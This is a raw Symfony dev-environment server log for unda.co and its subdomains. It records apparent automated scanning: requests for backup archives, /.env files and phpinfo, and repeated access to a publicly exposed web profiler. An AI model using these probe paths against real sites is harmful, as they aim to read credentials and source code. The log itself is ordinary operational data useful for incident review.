[2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:45:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:45:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422?panel=config","method":"GET"} []
[2025-12-17 15:45:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 15:57:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422?panel=security","method":"GET"} []
[2025-12-17 15:57:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 15:58:46] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-17 16:05:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4593c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b4593c?panel=exception","method":"GET"} []
[2025-12-17 16:05:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-17 16:07:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec?panel=twig","method":"GET"} []
[2025-12-17 16:07:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 16:09:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9b6635","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9b6635?panel=request","method":"GET"} []
[2025-12-17 16:09:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 16:17:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6f7da5","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/6f7da5?panel=time","method":"GET"} []
[2025-12-17 16:17:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 16:19:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec?panel=time","method":"GET"} []
[2025-12-17 16:19:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 16:27:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 16:27:16] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 16:29:12] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fswiftmailer-bundle&line=0","method":"GET"} []
[2025-12-17 16:30:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 16:30:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec?panel=security","method":"GET"} []
[2025-12-17 16:30:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 16:39:30] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 16:42:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=swiftmailer","method":"GET"} []
[2025-12-17 16:42:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-17 16:42:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec?panel=request","method":"GET"} []
[2025-12-17 16:42:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 16:44:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-17 16:44:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 16:44:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 16:44:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 16:44:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 16:44:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 16:44:30] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 16:47:24] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-17 16:52:37] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-17 16:52:37] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 16:52:37] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 16:52:37] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 16:52:37] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 16:52:37] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 16:52:37] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 16:52:37] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-17 16:52:37] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-17 16:52:40] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
[2025-12-17 16:52:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 16:53:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec?panel=config","method":"GET"} []
[2025-12-17 16:53:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 16:54:10] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-17 16:54:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c03d3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c03d3?panel=cache","method":"GET"} []
[2025-12-17 16:54:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 16:57:28] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-17 16:57:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 16:57:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 16:57:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 16:57:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 16:57:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 16:57:28] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 16:57:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-17 16:57:30] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-17 16:57:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 16:57:51] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3e61cf","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3e61cf/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-17 16:57:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-17 16:58:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c627b6","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c627b6?panel=time","method":"GET"} []
[2025-12-17 16:58:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 17:01:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 17:05:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec?panel=cache","method":"GET"} []
[2025-12-17 17:05:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 17:06:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"74da02","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/74da02?panel=db","method":"GET"} []
[2025-12-17 17:06:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-17 17:12:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8dbb7e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8dbb7e?panel=events","method":"GET"} []
[2025-12-17 17:12:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-17 17:17:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec","method":"GET"} []
[2025-12-17 17:17:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 17:18:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=47.242.70.104&limit=10&method=GET","method":"GET"} []
[2025-12-17 17:18:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=47.242.70.104&limit=10&method=GET","method":"GET"} []
[2025-12-17 17:22:06] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Fsensio%2Fgenerator-bundle&line=0","method":"GET"} []
[2025-12-17 17:24:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 17:31:11] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 17:32:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422?panel=request","method":"GET"} []
[2025-12-17 17:32:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 17:45:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422","method":"GET"} []
[2025-12-17 17:45:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 17:50:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"af2b6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/af2b6f?panel=router","method":"GET"} []
[2025-12-17 17:50:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-17 17:52:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb5734","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb5734?panel=logger","method":"GET"} []
[2025-12-17 17:52:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-17 17:57:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422?panel=cache","method":"GET"} []
[2025-12-17 17:57:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
